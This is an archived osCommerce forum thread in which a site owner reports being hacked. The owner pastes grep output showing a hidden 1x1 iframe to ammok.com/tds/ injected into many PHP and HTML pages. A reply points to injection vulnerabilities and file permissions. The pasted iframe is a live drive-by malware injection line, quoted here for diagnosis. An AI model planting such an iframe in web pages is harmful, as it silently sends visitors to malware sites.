Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site was hacked possible exploit?


ryans

Recommended Posts

I logged on my site one day and noticed a virus came up. checked the source and something added an iframe to most of the php pages. did a grep and found this.

 

admin/includes/languages/english/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
admin/includes/languages/espanol/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
admin/includes/languages/german/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
admin/index.php:<BODY MARGINWIDTH="0" MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" LEFTMARGIN="0" RIGHTMARGIN="0" BGCOLOR="#FFFFFF"><iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
images/index.html: <BODY><iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
images/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
images/wholesale/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/english/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/english/login.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/english2/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/english2/login.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/espanol/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/espanol/login.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/german/index.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
includes/languages/german/login.php:<iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>
login.php:<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://ammok.com/tds/' width='1' height='1' style='visibility: hidden;'></iframe>

Link to comment
Share on other sites

The latest version of osc (rc1) has fixes for possible (xss / injection) vulnerabilities, also since your files have been changed I guess you didn't set your file permissions correctly (should be read only for most php files).

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...